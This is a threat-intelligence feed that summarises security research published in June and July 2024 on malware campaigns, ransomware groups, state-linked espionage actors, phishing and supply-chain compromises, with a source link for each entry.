Intel Name:: CyberVolk_Ransomware

Date of Scan:: 2024-07-03

Impact:: LOW

Summary:: Security researcher Siri_urz identified the CyberVolk group unveiling new ransomware dubbed CyberVolk Ransomware with a unique encryption algorithm.

Source: https://x.com/siri_urz/status/1808126707951346116?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: ASEC

Intel Name:: AsyncRAT_Disguised_as_an_E_Book

Date of Scan:: 2024-07-03

Impact:: LOW

Summary:: ASEC researchers have uncovered new instances of malware distribution disguised as e-books, using multiple sophisticated techniques to execute AsyncRAT. These malicious e-books contain various malicious components, including a fake LNK file, a text file with a hidden PowerShell script, a compressed file that looks like a video, and a real e-book. The LNK file runs commands to execute the PowerShell script, which hides the malware folder and runs another obfuscated script that scans for security software. Based on the results, the script then runs malware hidden in the fake video files. There are multiple methods in which attackers are showing new ways to avoid detection and spread malware.

Source: https://asec.ahnlab.com/ko/67571/

Intel Source:: BleepingComputer

Intel Name:: Phishing_Emails_from_Hacked_Router_Helpdesk

Date of Scan:: 2024-07-03

Impact:: LOW

Summary:: Researchers from BleepingComputer have observed that the support portal of Mercku, a Canadian router manufacturer, was hacked. As a result, people who submit support tickets to Mercku are receiving phishing emails pretending to be from MetaMask.

Source: https://www.bleepingcomputer.com/news/security/router-makers-support-portal-hacked-replies-with-metamask-phishing/

Intel Source:: X (Twitter)

Intel Name:: North_Korea_Linked_Konni_APT_Group

Date of Scan:: 2024-07-03

Impact:: MEDIUM

Summary:: The Konni APT group has been a cyber espionage group since at least 2014. It is believed to be based in North Korea and is known for targeting government agencies and organizations in South Korea and the United States.

Source: https://x.com/500mk500/status/1808452853356208469?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: Zscaler

Intel Name:: A_Historical_Overview_of_SmokeLoader

Date of Scan:: 2024-07-03

Impact:: LOW

Summary:: Zscalar ThreatLabz researchers have investigated the growth of SmokeLoader, a malware downloader that has been active since 2011. Furthermore, they provided an overview of SmokeLoader's development from 2015 to 2022, during which time the malware updated its algorithms and improved anti-analysis capabilities.

Source: https://www.zscaler.com/blogs/security-research/brief-history-smokeloader-part-2

Intel Source:: X (Twitter)

Intel Name:: Malicious_LNK_Files_Have_Proliferated_Recently

Date of Scan:: 2024-07-03

Impact:: LOW

Summary:: The malicious LNK files have been identified by security researcher DOCGuard on X (Twitter). LNK files are based on the Shell Link Binary file format, also known as Windows shortcuts. But what seems a relatively simple ability to execute other binaries on the system can inflict great harm when abused by threat actors.

Source: https://x.com/doc_guard/status/1808138663017975965

Intel Source:: ReliaQuest Threat Research

Intel Name:: Medusa_ransomware_group_attack

Date of Scan:: 2024-07-02

Impact:: LOW

Summary:: Last month, ReliaQuest was notified and responded to detections of a ransomware attack by the “Medusa” ransomware group that encrypted various hosts in a customer environment. ReliaQuest Threat Research team investigated and found that Medusa utilized a compromised VPN account for initial access, NTDS dumps for credential access, and RDP for lateral movement.

Source: https://www.reliaquest.com/blog/medusa-attack-analysis/

Intel Source:: Infoblox

Intel Name:: Coral_Raider_KIill_Chain

Date of Scan:: 2024-07-02

Impact:: LOW

Summary:: Researchers at Infoblox have discovered a major cyber campaign run by Coral Raider. This campaign started in February 2024. It spreads different types of infostealer malware like Rhadamanthys, Lumma C2, and Cryptbot. This campaign Coral Raider employs a sophisticated tactic of using Content Delivery Networks (CDNs) to host malicious files and payloads. This tactic hides their malicious activities from potential victims. CDNs are usually used to deliver content quickly, but in this case, they help Coral Raider avoid detection and spread malware smoothly.

Source: https://blogs.infoblox.com/threat-intelligence/dns-early-detection-breaking-the-coral-raider-kill-chain/

Intel Source:: Nao_Sec

Intel Name:: Diving_Deep_into_ShadowPad_Builder

Date of Scan:: 2024-07-02

Impact:: LOW

Summary:: Researchers at Nao_Sec have explored the ShadowPad malware builder, which had been a mystery that allowed sophisticated threat actors to customize and deploy ShadowPad (PlugX's successor). This is where it describes the way attackers set up their malware and create payloads, prepare command and control infrastructures, as well as run campaigns while explaining its operational intricacies.

Source: https://nao-sec.org/2024/06/building-caspers-shadow.html#fn:4

Intel Source:: Rewterz

Intel Name:: AsyncRAT_ActiveIOCs

Date of Scan:: 2024-07-02

Impact:: LOW

Summary:: Researchers at Rewterz explores AsyncRAT, an open-source remote monitoring tool using encrypted connections that cybercriminals misuse for keylogging, remote access, and spreading malicious software. It infects systems by sending malicious files and transferring malicious programs to USB drives. Recent attacks, including those targeting Thailand Pass users and the Follina Outbreak in Australia, have used AsyncRAT. It spreads through spear-phishing, malicious ads, and exploit kits, using encryption and obfuscation to avoid detection and updating itself with new features. To protect against AsyncRAT, keep software updated, use strong passwords, back up data, and use anti-malware software.

Source: https://www.rewterz.com/threat-advisory/asyncrat-active-iocs-4

Intel Source:: Soniwall

Intel Name:: New_Orcinius_trojan

Date of Scan:: 2024-07-02

Impact:: MEDIUM

Summary:: The SonicWall Capture Labs threat research team recently discovered a new Orcinius Trojan that uses VBA stomping to mask its infection. The malware, disguised as an Italian calendar spreadsheet, contains an obfuscated VBA macro that monitors running windows and keystrokes, creating persistence using registry keys. It is suggested that the malware is associated with Remcos, AgentTesla, Neshta, and HTMLDropper, which masquerades as 'Synaptics.exe'.

Source: https://blog.sonicwall.com/en-us/2024/06/new-orcinius-trojan-uses-vba-stomping-to-mask-infection/

Intel Source:: K7 Security Labs

Intel Name:: Forked_Kematian_Stealer

Date of Scan:: 2024-07-02

Impact:: LOW

Summary:: Researchers from K7 Labs have uncovered Kematian Stealer, a PowerShell-based malware that developed from a PowerShell Token-Grabber. The C++ loader hides an obfuscated script that decrypts and runs a batch file with advanced privileges to execute the PowerShell script. This script checks for admin rights and creates persistence via the Windows Task Scheduler. It collects system and network information, such as public IP, UUID, MAC addresses, and username, storing this data in the temp directory. To evade detection, it removes files related to Discord Token Protector and attempts to download a payload, redirecting to the Kematian stealer GitHub page.

Source: https://labs.k7computing.com/

Intel Source:: Sekoia

Intel Name:: Exposing_FakeBat_loader

Date of Scan:: 2024-07-02

Impact:: MEDIUM

Summary:: In the last couple of months, FakeBat was one of the most widespread loaders using the drive-by download technique. Researchers discovered multiple FakeBat distribution campaigns leveraging malvertising, software impersonation, fake web browser updates, and social engineering schemes on social networks to trick users into downloading the malware. Analysts monitored the FakeBat C2 infrastructure and identified over 130 domain names associated with high confidence in the FakeBat C2 servers since August 2023.

Source: https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/#h-iocs

Intel Source:: Qianxin

Intel Name:: A_Deep_dive_into_the_Zergeca_botnet

Date of Scan:: 2024-07-02

Impact:: LOW

Summary:: The Zergeca botnet is a recently discovered malicious network that can support six different attack methods and has been designed to evade detection by antivirus software. The botnet primarily targets regions such as Canada, the United States, and Germany, and the main type of attack is ackFlood.

Source: https://blog.xlab.qianxin.com/a-deep-dive-into-the-zergeca-botnet/

Intel Source:: Cyberthint

Intel Name:: An_Overview_of_Sea_Turtle_APT_Group

Date of Scan:: 2024-07-02

Impact:: MEDIUM

Summary:: The operations of Sea Turtle, a prominent Turkish cyber espionage group known under many other names including Teal Kurma, Marbled Dust, SILICON and Cosmic Wolf, have been examined by Cyberthint researchers. The year 2017 marked the emergence of Sea Turtle in Europe, North Africa and the Middle East where it targeted such areas as governments, terrorist groups, IT providers, ISPs, media & entertainment organisations, NGOs as well as telecommunication with DNS hijacking and other sophisticated tactics. Their interests also pertain to Turkey’s security and include traffic redirection and unauthorized access to critical infrastructures.

Source: https://cyberthint.io/sea-turtle-apt-group-analysis/

Intel Source:: Halcyon

Intel Name:: New_ransomware_tracked_as_Volcano_Demon

Date of Scan:: 2024-07-02

Impact:: LOW

Summary:: Halcyon has discovered a new ransomware group and was tracked as Volcano Demon which had some attacks last couple of weeks. The following encryptor sample dubbed LukaLocker was identified as encrypting victim files with the .nba file extension. Volcano Demon had a bit of luck in locking both Windows workstations and servers after utilizing common administrative credentials harvested from the network.

Source: https://www.halcyon.ai/blog/halcyon-identifies-new-ransomware-operator-volcano-demon-serving-up-lukalocker

Intel Source:: Qianxin

Intel Name:: Mining_Gang_new_malware

Date of Scan:: 2024-07-02

Impact:: LOW

Summary:: QIanxin describes the discovery and analysis of k4spreader, a new malware installer and spreader tool developed by the 8220 mining gang. k4spreader is written in cgo and implements system persistence, self-updating, and releasing other malware like the Tsunami botnet and PwnRig miner. The tool is still in early development with three versions observed so far.

Source: https://blog.xlab.qianxin.com/8220-k4spreader-new-tool-en/

Intel Source:: ThreatMon

Intel Name:: An_Open_Source_Stealer_Tool_Dubbed_Typez_Stealer

Date of Scan:: 2024-07-02

Impact:: LOW

Summary:: ThreatMon researchers have discovered a new open-source stealer tool named Typez Stealer, built in Python and available on GitHub. It includes features such as Discord Nitro, billing, email, contact information, heidye codes, etc. Also, It is said to be capable of revealing information about the system.

Source: https://x.com/monthreat/status/1807701750234669197?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: Blackberry

Intel Name:: RisePro_Information_Stealer

Date of Scan:: 2024-07-01

Impact:: MEDIUM

Summary:: Blackberry researchers uncover the malware called RisePro, it is a flexible malware available for purchase on underground forums. It became active in late 2023 and early 2024. This malware infects systems through malicious links and can be distributed by malware like PrivateLoader. RisePro connects to a C2 server to steal data like browser details and cryptocurrency wallets. It's believed to be developed by Russian-speaking individuals and operates on a subscription basis, allowing customization of its features. RisePro often masquerades as legitimate software and has advanced capabilities to evade detection and maintain persistence on infected devices. Recent versions use a custom TCP protocol for communication. Organizations should implement proactive cybersecurity measures like continuous monitoring and robust endpoint security.

Source: https://blogs.blackberry.com/en/2024/06/threat-analysis-insight-risepro-information-stealer

Intel Source:: Recorded Future

Intel Name:: Russia_and_Iran_Targeting_French_Elections

Date of Scan:: 2024-07-01

Impact:: MEDIUM

Summary:: According to research by Insikt Group, Russian and Iranian influence networks are targeting the upcoming French elections, but their effect is now insignificant. While the CopyCop network employs artificial intelligence (AI) to spread pro-Russian narratives, the Russia-affiliated Doppelganger network uses social media bots and cloned websites to push pro-Russian content. Iran's minimal involvement is probably a reaction to France's support of Israel.

Source: https://go.recordedfuture.com/hubfs/reports/TA-2024-0628.pdf

Intel Source:: Rewterz

Intel Name:: Lumma_Stealer_Malware_Active_IOCs

Date of Scan:: 2024-07-01

Impact:: LOW

Summary:: Lumma Stealer, also known as LummaC, is an information stealer sold as Malware-as-a-Service (MaaS) on Russian-speaking underground forums and Telegram. This malware is Written in C language, it efficiently accesses system resources to steal sensitive information, primarily targeting cryptocurrency wallets and related data such as private keys and wallet.dat files. It also has file-grabber capabilities. To protect against Lumma and similar threats, it's critical to update software, use strong passwords, enable multi-factor authentication, avoid suspicious links, and use reputable antivirus solutions.

Source: https://www.rewterz.com/threat-advisory/lumma-stealer-malware-aka-lummac-active-iocs-2

Intel Source:: Rapid7

Intel Name:: Supply_Chain_Compromise

Date of Scan:: 2024-07-01

Impact:: MEDIUM

Summary:: Rapid7 discovered that installers for Notezilla, RecentX, and Copywhiz hosted on conceptworld[.]com were trojanized to execute information-stealing malware. The malware can steal browser credentials, crypto wallet info, clipboard data, and keystrokes, as well as download additional payloads. Rapid7 disclosed the issue to Conceptworld, who promptly removed the malicious installers.

Source: https://www.rapid7.com/blog/post/2024/06/27/supply-chain-compromise-leads-to-trojanized-installers-for-notezilla-recentx-copywhiz/

Intel Source:: X (Twitter)

Intel Name:: New_Lockbit_Ransom_Note

Date of Scan:: 2024-06-28

Impact:: HIGH

Summary:: Security researcher Dominic Alvieri identified the new Lockbit ransom note on X (Twitter). The note includes “Your files have been encrypted with Lockbit ransomware.” and provides an email address to contact.

Source: https://x.com/alvierid/status/1806134812157034720?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: Malwarebytes Labs

Intel Name:: Poseidon_Mac_Stealer_Spreading_via_Google_Ads

Date of Scan:: 2024-06-28

Impact:: LOW

Summary:: Researchers at Malwarebytes Labs have discovered a fresh operation that uses malicious Google advertisements for the Arc browser to spread a stealer that targets Mac users. Arc has been utilized as a lure twice in the last several months, which is undoubtedly evidence of its popularity. Before, a Windows RAT was dropped using Google advertisements as well.

Source: https://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads

Intel Source:: Trend Micro

Intel Name:: Analyzing_Water_Sigbin_Infection_Process

Date of Scan:: 2024-06-28

Impact:: LOW

Summary:: Trend Micro researchers have investigated the multi-stage loading technique that is employed to distribute the XMRIG cryptocurrency miner and PureCrypter loader. In this campaign, all payloads that are used to avoid reverse engineering use the .Net Reactor, a. NET code protection software. That protection of the code obfuscates it, thereby preventing defenders from understanding and reproducing. Also, it includes anti-debugging methods.

Source: https://www.trendmicro.com/en_us/research/24/f/water-sigbin-xmrig.html

Intel Source:: ThreatMon

Intel Name:: New_Stealer_Tool_Named_Kematian_Stealer

Date of Scan:: 2024-06-28

Impact:: LOW

Summary:: ThreatMon researchers discovered an open-source stealing tool called Kematian Stealer, which is built in Python and posted on GitHub. This tool's wide range of capabilities presents serious concerns.

Source: https://x.com/monthreat/status/1806623709693624782?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: Zscaler

Intel Name:: Kimsuky_Deploys_TRANSLATEXT_in_South_Korea

Date of Scan:: 2024-06-28

Impact:: LOW

Summary:: Researchers from Zscaler ThreatLabz have observed new activity from Kimsuky, a North Korean government-backed hacker group. This group is targeting academic institutions in South Korea to gather intelligence. The researchers found that Kimsuky is using a new Google Chrome extension called "TRANSLATEXT" for cyber espionage. This extension is designed to steal email addresses, usernames, passwords, cookies, and take screenshots of the browser. It is important to be careful when installing programs from untrusted sources to stay safe and avoid potential security breaches.

Source: https://www.zscaler.com/blogs/security-research/kimsuky-deploys-translatext-target-south-korean-academia

Intel Source:: Outpost24

Intel Name:: Unfurling_Hemlock_Hackers_Infecting_Systems

Date of Scan:: 2024-06-28

Impact:: MEDIUM

Summary:: Researchers at Outpost24 have disclosed a massive malware campaign which appears to be the handiwork of cyber threat group Unfurling Hemlock, believed to reside in Eastern Europe and has orchestrated a large-scale malware campaign aimed at financial gain. Using complex distribution vectors, such as nested cabinet files and multiple payloads spread through loaders and emails across the globe to deliver their hundreds of thousands of malware samples. Relying on stealers and loaders in their operations suggests they are less focused on targeted attacks, instead preferring to infect as many as possible. The group's infrastructure and language artifacts point to direct links with the well-established Eastern European cybercriminal networks, detailing their disciplined and making-a-buck business model in malware-based operations.

Source: https://outpost24.com/blog/unfurling-hemlock-cluster-bomb-campaign/

Intel Source:: PaloAlto

Intel Name:: The_Latrodectus_Infection_Is_Returning

Date of Scan:: 2024-06-28

Impact:: LOW

Summary:: PaloAlto researchers observed Latrodectus infection using BackConnect and KeyholeVNC traffic. After going silent for a few weeks, latrodectus came back again.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-06-25-IOCs-from-Latrodectus-activity.txt

Intel Source:: X (Twitter)

Intel Name:: New_DLS_of_Blackbasta_Ransomware

Date of Scan:: 2024-06-28

Impact:: MEDIUM

Summary:: A new DLS of Blackbasta ransomware has been identified by security researcher Rakesh Krishnan on X (Twitter). BlackBasta emerged in April 2022 and has already compromised over 200 organizations, thus representing one of the most threatening ransomware gangs in the cyber scene.

Source: https://x.com/rakeshkrish12/status/1806216139581669867?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: ASEC

Intel Name:: Analysis_of_HFS_Server_Attack

Date of Scan:: 2024-06-28

Impact:: LOW

Summary:: ASEC researchers have uncovered the exploitation of vulnerability CVE-2024-23692 in HFS (HTTP File Server) version 2.3m. Attackers infiltrate systems, gather information with commands like "whoami" and "arp," create hidden backdoor accounts, and install malware such as the XMRig coin miner. The attackers are believed to be part of a Chinese-speaking group, including four groups, one of which is the known group LemonDuck. Besides XMRig, they also use various RAT malware such as XenoRAT, Gh0stRAT, PlugX, CobaltStrike, and Netcat. Additionally, GoThief malware, which steals information using Amazon S3, has been identified. Users of HFS should update to the latest version to avoid these vulnerabilities.

Source: https://asec.ahnlab.com/ko/67509/

Intel Source:: Rewterz

Intel Name:: Agent_Tesla_Malware_active_IOCs

Date of Scan:: 2024-06-28

Impact:: MEDIUM

Summary:: Rewterz researchers have uncovered the Trojan called Agent Tesla, a popular spyware active since 2014. It is known for stealing data from browsers, FTP clients, and other apps. It is often spread via phishing emails, it can capture screenshots, clipboard data, and access webcams. Agent Tesla can also disable antivirus programs and uses techniques to evade detection, such as checking for virtual machines, code obfuscation, and encrypting communications. It targets a wide range of victims, including individuals, small businesses, and large organizations across various sectors like finance, healthcare, and government, making it a global threat. Recently, a campaign used steganography to hide Agent Tesla in an EML file, which then executed malicious JavaScript and PowerShell commands.

Source: https://www.rewterz.com/threat-advisory/agent-tesla-malware-active-iocs-6

Intel Source:: ASEC

Intel Name:: Xctdoor_malware_targeting_domestic_companies

Date of Scan:: 2024-06-27

Impact:: LOW

Summary:: ASEC researchers have recently discovered that attackers are exploiting a domestic ERP solution to carry out attacks. After breaching the system, they target the ERP update server to control company systems and attack vulnerable web servers to distribute malicious code, primarily affecting defense and manufacturing companies. The backdoor, called Xctdoor, developed in the Go language, can inject itself into various processes, persist through reboots, and communicate with C2 servers. This malware can steal information such as screenshots, keystrokes, and drive details.

Source: https://asec.ahnlab.com/ko/67034/

Intel Source:: PaloAlto

Intel Name:: Attackers_Exploit_Cobalt_Strike_Profiles

Date of Scan:: 2024-06-27

Impact:: LOW

Summary:: Palo Alto researchers have uncovered new malicious uses of Cobalt Strike, a tool design for cybersecurity testing but often misused by cybercriminals. There are some instances where attackers modify Malleable C2 profiles to conceal Cobalt Strike's traffic, making it difficult to detect. These profiles, originally shared on public repositories for legitimate purposes, are easily replicated and changed by attackers. Analyzing profiles and document alterations in HTTP paths and User-Agent details, show how attackers modify them to avoid being detected. The evolving tactics of attackers pose a challenge for traditional network security due to the variety of profile variations.

Source: https://unit42.paloaltonetworks.com/attackers-exploit-public-cobalt-strike-profiles/

Intel Source:: ASEC

Intel Name:: Kimsuky_New_Backdoor_is_HappyDoor

Date of Scan:: 2024-06-27

Impact:: MEDIUM

Summary:: Researchers at ASEC have identified that the Kimsuky group, a recognized North Korean threat actor, has been employing the HappyDoor malware in their cyber-attacks since 2021. This group distributes the HappyDoor malware via spear phishing emails containing Jscript or executable file attachments, which also execute a decoy file. The malware is equipped with capabilities for information theft, screen capture, and device information collection. It encrypts stolen data before transmitting it to a C2 server via HTTP. The malware undergoes regular updates and utilizes encrypted packets for communication. Kimsuky frequently employs social engineering tactics to deceive victims into executing malicious attachments, enabling HappyDoor to install additional malware for remote control and data exfiltration.

Source: https://asec.ahnlab.com/ko/67128/

Intel Source:: ASEC

Intel Name:: Malware_Innovation_in_InnoSetup

Date of Scan:: 2024-06-27

Impact:: LOW

Summary:: Researchers from ASEC have observed a new type of malware that disguised as cracks and commercial tools. Unlike past malware, which performed malicious behaviors immediately upon being executed, this malware presents an installer UI and activates its harmful actions when the user interacts with buttons during the installation process. It appears that when a user requests a download, a unique piece of malware is generated and delivered instantly, rather than distributing pre-made malware. This results in each download producing malware with a distinct hash value but same functionality.

Source: https://asec.ahnlab.com/en/67502/

Intel Name:: DBatLoader_Spreading_via_CMD_Files

Date of Scan:: 2024-06-27

Impact:: LOW

Summary:: Researchers from ASEC have discovered a new distribution method for DBatLoader (ModiLoader) malware using CMD files. Initially spread through phishing emails in RAR format containing EXE files, DBatLoader now uses UTF-16LE encoding to hide its code. Once decoded it reveals as an EXE file compiled in Delphi, capable of loading DLLs, fetching external data, and executing decoded payloads, increasing its threat potential.

Source: https://asec.ahnlab.com/en/67468/

Intel Source:: Sansec Forensics

Intel Name:: Polyfill_supply_chain_attack

Date of Scan:: 2024-06-27

Impact:: LOW

Summary:: A malicious Chinese entity acquired control over the popular Polyfill JS open-source project and has been injecting malware into over 100,000 websites that embed the polyfill.io content delivery network. The malware redirects mobile users to a fraudulent sports betting site hosted on a domain impersonating Google Analytics. The attack employs various evasion techniques and targets specific devices and time windows. While trustworthy alternatives are available, it's recommended to remove any references to polyfill.io from your codebase as the library is no longer necessary for modern browsers.

Source: https://sansec.io/research/polyfill-supply-chain-attack

Intel Source:: Fortinet

Intel Name:: MerkSpy_Exploitation_of_CVE_2021_40444

Date of Scan:: 2024-06-27

Impact:: LOW

Summary:: FortiGuard Researchers have discovered an attack exploiting the CVE-2021-40444 vulnerability in Microsoft Office. This allows attackers to run malicious code through specially crafted documents. The attack led to the deployment of "MerkSpy," which secretly monitors activities, steals information, and starts automatically by disguising itself as a legitimate update. The attack begins with a fake job description in a Microsoft Word document. Opening the document triggers the CVE-2021-40444 exploitation, a remote code execution vulnerability within the MSHTML component used by Internet Explorer in Microsoft Office.

Source: https://www.fortinet.com/blog/threat-research/merkspy-exploiting-cve-2021-40444-to-infiltrate-systems

Intel Source:: ReversingLabs

Intel Name:: Malicious_NPM_Package_Aiming_at_Amazon_Users

Date of Scan:: 2024-06-27

Impact:: MEDIUM

Summary:: Researchers at ReversingLabs have identified that the threat of malicious packages in open source repositories like npm and PyPI is on the rise. The post reports on situations where supposedly innocuous software packages were actually hiding malicious scripts or installing nefarious payloads upon installation. As much as maintainers try to keep an eye on and be delicate in what they build, the sheer size of the open source world makes it hard.

Source: https://www.reversinglabs.com/blog/a-lurking-npm-package-makes-the-case-for-open-source-health-checks

Intel Source:: CERT-AGID

Intel Name:: The_Infostealer_0bj3ctivity_is_Operational_Again

Date of Scan:: 2024-06-27

Impact:: LOW

Summary:: CERT-AGID researchers have observed a campaign spreading the 0bj3ctivity infostealer (a.k.s PXRECVOWEIWOEI stealer) in Italy employs advanced techniques with a tinge of English language, that have just resurfaced. The attack starts with emails that include a Discord URL and an image with some obscuration, which now uses JavaScript in place of VBS files. This will result in PowerShell downloading a steganographed .NET file on the second stage used to drop and execute infostealer. The stolen data, which includes information about the compromised machine as well as credentials for the most common FTP, instant messaging, and email clients, is saved as text files, compacted into a single ZIP package, and delivered to C2 via email or Telegram.

Source: https://cert-agid.gov.it/news/linfostealer-0bj3ctivity-e-tornato-in-azione/

Intel Source:: X (Twitter)

Intel Name:: Noodle_RAT_Naked_Network_Traffic

Date of Scan:: 2024-06-26

Impact:: LOW

Summary:: Security researcher Ksenia identified the Noodle RAT naked network traffic on X (Twitter). Noodle RAT, also known as ANGRYREBEL and Nood RAT, has been associated with Chinese-speaking espionage groups since at least July 2016. Initially mistaken for variants of Gh0st RAT and Rekoobe, it has only recently been recognized as a distinct type of malware.

Source: https://x.com/naumovax/status/1803788216924877090?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: Rewterz

Intel Name:: Quasar_RAT_aka_CinaRAT

Date of Scan:: 2024-06-26

Impact:: LOW

Summary:: Rewterz researchers have identified new malware called Quasar RAT, a malicious software first discovered in 2015, that is abused by cybercriminals to take control of a victim's machine. It is usually spread through phishing emails or deceptive tactics, tricking users into clicking malicious links or downloading infected files. Once installed, it can view and manipulate files, record keystrokes, steal login information, take screenshots, and access the victim's webcam and microphone. It can also install other malware and use the infected systems to attack other targets.

Source: https://www.rewterz.com/threat-advisory/quasar-rat-aka-cinarat-active-iocs-3

Intel Source:: Strike Ready Labs

Intel Name:: The_details_a_Russian_TA_attacking_Ukraine

Date of Scan:: 2024-06-26

Impact:: MEDIUM

Summary:: Stride Ready Labs researchers shared their report with the details of a Russia-linked threat actor targeting Ukraine, employing various obfuscation techniques. The malicious activity involves dropping a compressed file disguised as an RAR archive, which fetches a remote image likely for tracking execution. The payload employs mshta.exe to execute remote content and leverages LNK files with crafted filenames. The techniques suggest an effort to evade detection and hamper analysis.

Source: https://blog.strikeready.com/blog/armageddon-is-more-than-a-grammy-nominated-album/

Intel Source:: Any.Run

Intel Name:: A_detailed_investigation_of_the_phishing_campaign

Date of Scan:: 2024-06-26

Impact:: LOW

Summary:: Any.Run researchers run a detailed investigation of the phishing campaign encountered by this company. The researchers found around 72 phishing domains pretending to be real or fake companies. These domains created believable websites that tricked people into sharing their login details. The attack was sophisticated, using advanced techniques like direct human interaction to deceive targets.

Source: https://any.run/cybersecurity-blog/analysis-of-the-phishing-campaign/

Intel Source:: Sentinel Labs

Intel Name:: A_Suspected_Chinese_APT_Group_Named_ChamelGang

Date of Scan:: 2024-06-26

Impact:: MEDIUM

Summary:: Researchers from SentinelLabs who recently collaborated with Recorded Future have observed and reported two separate threat groups that are specializing in attacking the government and critical infrastructure sectors around the world between 2021 and 2023. One of these clusters has been linked to the Chinese APT group ChamelGang (a.k.a. CamoFei). Second cluster is similar to previous attacks attributed to suspected Chinese and North Korean APT groups whereas the first one stands out from usual modus operandi of those teams. Most actions within the activities of these clusters include launching ransomware or data encryption tools, indicating a major risk to organizational data security and operational continuity across industry sectors.

Source: https://assets.sentinelone.com/sentinellabs/chamelgang-friends-en

Intel Source:: Fortinet

Intel Name:: Malware_Concealed_Behind_Cloud_Services

Date of Scan:: 2024-06-26

Impact:: MEDIUM

Summary:: FortiGuard researchers have identified botnets that use cloud services to increase their malicious activities. Botnets like UNSTABLE and Condi are spreading malware through cloud storage and computing services, making it difficult to disrupt their operations. The UNSTABLE Botnet, a Mirai variant, exploits vulnerabilities in various devices like JAWS webservers and TP-Link routers, using brute-force techniques and DDoS attacks. Similarly, the Condi Botnet exploits vulnerabilities to gain device control and establish connections to its command server. An analysis showed that these botnets use sophisticated methods to avoid detection and keep their operations running smoothly.

Source: https://www.fortinet.com/blog/threat-research/growing-threat-of-malware-concealed-behind-cloud-services

Intel Source:: X (Twitter)

Intel Name:: BrainCipher_Ransomware

Date of Scan:: 2024-06-26

Impact:: MEDIUM

Summary:: A new ransomware known as BrainCipher has been identified by security researcher Gameel Ali on X (Twitter). Furthermore, the threat actors behind the BrainCipher ransomware used a leaked Lockbit builder to develop it.

Source: https://x.com/malgamy12/status/1805884150399770871?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: Cado Security

Intel Name:: P2PInfect_Botnet_Aimed_at_REdis_Servers

Date of Scan:: 2024-06-25

Impact:: LOW

Summary:: A new P2Pinfect update has been found containing a ransomware and crypto miner payload. According to Cado Security, which has been tracking P2PInfect for some time, says it has evidence P2PInfect is a type of botnet for hire, but contradictions among the data available to researchers means they cannot definitively say so at this point. After the malware was examined, it was found that it leveraged one of the Redis replication function to spread.

Source: https://www.cadosecurity.com/blog/from-dormant-to-dangerous-p2pinfect-evolves-to-deploy-new-ransomware-and-cryptominer

Intel Source:: ISC.SANS

Intel Name:: Hunting_for_configuration_files

Date of Scan:: 2024-06-25

Impact:: LOW

Summary:: The ISC.SANS researcher Johannes Ullrich noticed in their "First Seen URL" list a new variation that appears to target Java Spring configuration files.

Source: https://isc.sans.edu/diary/Configuration+Scanners+Adding+Java+Specific+Configuration+Files/31032/

Intel Source:: Sonicwall

Intel Name:: A_surge_in_JavaScript_spreading_StrelaStealer

Date of Scan:: 2024-06-25

Impact:: LOW

Summary:: Sonicwall observations indicated a surge in JavaScript spreading StrelaStealer, a credential stealer that targets Outlook and Thunderbird email credentials. The campaign is currently confined to Poland, Spain, Italy, and Germany. The malware employs an obfuscated JavaScript file delivered via email attachments to initiate the attack chain, evading detection through self-copying and encoding techniques. Once executed, it selectively infects non-Russian systems and steals email account information, sending it to a remote server.

Source: https://blog.sonicwall.com/en-us/2024/06/strelastealer-resurgence-tracking-a-javascript-driven-credential-stealer-targeting-europe/

Intel Source:: Rewterz

Intel Name:: GuLoader_Malspam_Campaign

Date of Scan:: 2024-06-25

Impact:: MEDIUM

Summary:: Rewterz researchers have uncovered GuLoader, a downloader malware that has been active since 2019. It spreads through spam emails containing malicious attachments. Once installed on a computer, GuLoader downloads other malware like AgentTesla, FormBook, and NanoCore. It hides its activities by storing encrypted malware on cloud services like Google Drive and Microsoft OneDrive. GuLoader is difficult to detect because it uses legitimate file-sharing sites that are not closely monitored. It has evolved with advanced techniques to avoid antivirus detection and maintain persistence on infected systems by modifying settings and startup items. To protect against this malware, it is important to have a strong antivirus solution in place and to keep all software up to date with the latest security patches.

Source: https://www.rewterz.com/threat-advisory/guloader-malspam-campaign-active-iocs-3

Intel Source:: Cyble

Intel Name:: UAC_0184s_malware_cmpaign

Date of Scan:: 2024-06-25

Impact:: MEDIUM

Summary:: Cyble researchers observed a malware campaign involving a malicious lnk file tied to the UAC-0184 threat actor group. When the LNK shortcut file is executed, it makes a PowerShell script that downloads a ZIP file that has legitimate and malicious Python components, including an encrypted payload. This attack employs DLL sideloading and Shadowloader to execute the XWorm RAT as the final payload.

Source: https://cyble.com/blog/uac-0184-abuses-python-in-dll-sideloading-for-xworm-distribution/

Intel Source:: Sucuri

Intel Name:: Caesar_Cipher_Skimmer_Attack

Date of Scan:: 2024-06-25

Impact:: LOW

Summary:: Sucuri researchers have identified a new "gtag" credit card skimming attack called the Caesar Cipher Skimmer, affecting CMS platforms like WordPress, Magento, and OpenCart. This malware injects malicious code into critical PHP files, masquerading as legitimate scripts such as Google Analytics or Google Tag Manager. It uses encryption to avoid detection and connects to remote servers via WebSockets to steal credit card details from compromised sites. Attackers utilize domains with intentional misspellings and frequently change them to evade security measures. This shows the importance of robust website security practices and continuous monitoring to defend against such evolving threats.

Source: https://blog.sucuri.net/2024/06/caesar-cipher-skimmer.html

Intel Source:: Any.Run

Intel Name:: Phishing_Incident_Overview

Date of Scan:: 2024-06-25

Impact:: LOW

Summary:: Researchers from ANY.RUN have identified a phishing email sent by one of their own employees to everyone in the employee's contact list. Clicking on the email leads to a fake Microsoft sign-in page containing a malicious JavaScript. It is soon discovered that the employee's account has been compromised, allowing unauthorized access to conduct a business email compromise (BEC) campaign. The breach occurs due to AiTM phishing tactics and flaws in multi-factor authentication (MFA) policies, enabling the attacker to register their own mobile device for continued access. The attacker then uses Perfect Data Software to potentially back up the entire mailbox and sends phishing emails to contact.

